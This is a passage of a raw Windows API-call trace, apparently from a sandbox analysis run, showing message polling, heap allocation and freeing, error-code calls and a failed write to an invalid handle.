wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.507] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.507] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.508] GetLastError () returned 0x6 [0257.508] SetLastError (dwErrCode=0x6) [0257.508] GetLastError () returned 0x6 [0257.508] SetLastError (dwErrCode=0x6) [0257.508] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.508] GetLastError () returned 0x6 [0257.508] GetLastError () returned 0x6 [0257.508] SetLastError (dwErrCode=0x6) [0257.508] GetLastError () returned 0x6 [0257.508] SetLastError (dwErrCode=0x6) [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b20 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.508] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.508] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.508] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.508] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.508] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.509] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.509] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.509] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18800462938) returned 1 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.509] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.509] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01988 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.509] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda678 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.509] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.510] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.510] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda660 | out: hHeap=0xbc0000) returned 1 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.510] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.510] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.510] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.510] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.510] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dd8 | out: hHeap=0xbc0000) returned 1 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dd8 | out: hHeap=0xbc0000) returned 1 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.511] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.511] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.511] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dd8 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01958 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.512] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.512] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.512] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.512] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.514] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.514] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.514] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.514] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019b8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.515] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.515] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.515] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.515] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.515] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.516] 